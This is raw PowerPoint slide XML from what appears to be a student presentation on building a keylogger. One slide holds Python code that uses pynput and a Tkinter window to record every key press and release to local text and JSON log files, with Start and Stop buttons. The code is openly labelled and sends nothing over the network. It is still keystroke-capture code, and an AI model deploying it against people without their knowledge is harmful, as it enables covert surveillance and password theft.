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17" d="100"/>
          <a:sy n="11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4/11/2024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01433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02357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22452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769957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8464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7368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036638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26365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94640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680282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93776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578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4/11/2024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839228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610982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76152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4/11/2024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515329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5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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="49285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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="581193" y="1391479"/>
            <a:ext cx="5194767" cy="44695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8" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="6416039" y="1391479"/>
            <a:ext cx="5194768" cy="44695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4/11/2024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7945911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4/11/2024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391984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41855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84372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118654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58562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3375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919102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33095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75308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4/11/2024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76025936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6070" indent="-306070"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6070"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2060"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2104"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20027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y</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l</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o</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g</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g</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a</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n</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d</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u</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i</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t</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y</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831783" y="3691028"/>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 VELMURUGAN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ING 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072365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662649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258244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2565911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577084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004480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353542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433822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3" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solid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R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="295836" y="1601516"/>
            <a:ext cx="5194767" cy="4469572"/>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import tkinter as tk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from tkinter import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from pynput import keyboard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import json</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keys_used =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keys =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generate_text_log(key):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with open('key_log.txt', "w+") as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keys.write(key)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with open('key_log.json', '+wb') as key_log:</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key_list_bytes = json.dumps(keys_used).encode()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key_log.write(key_list_bytes)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on_press(key):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flag, keys_used,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{'Pressed':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{'Held':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on_release(key):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flag, keys_used,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{'Released':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 = keys + str(key)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generate_text_log(str(keys))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start_keylogger():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listener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 = keyboard.Listener(on_press=on_press, on_release=on_release)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listener.start()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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config(state='disabled')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stop_button.config(state='normal')</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stop_keylogger():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listener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listener.stop()</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label.config(text="Keylogger stopped.")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start_button.config(state='normal')</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stop_button.config(state='disabled')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 = Tk()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root.title("Keylogger")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 = Label(root, text='Click "Start" to begin keylogging.')</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label.config(anchor=CENTER)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label.pack()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start_button = Button(root, text="Start", command=start_keylogger)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start_button.pack(side=LEFT)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stop_button = Button(root, text="Stop", command=stop_keylogger, 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stop_button.pack(side=RIGHT)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root.geometry("250x250")</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root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="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234530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535383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8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8868578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cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>0</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T06:27:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-11T07:18:38Z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1033-0.0.0.0</vt:lpwstr>
  </property>
</Properties>
</file>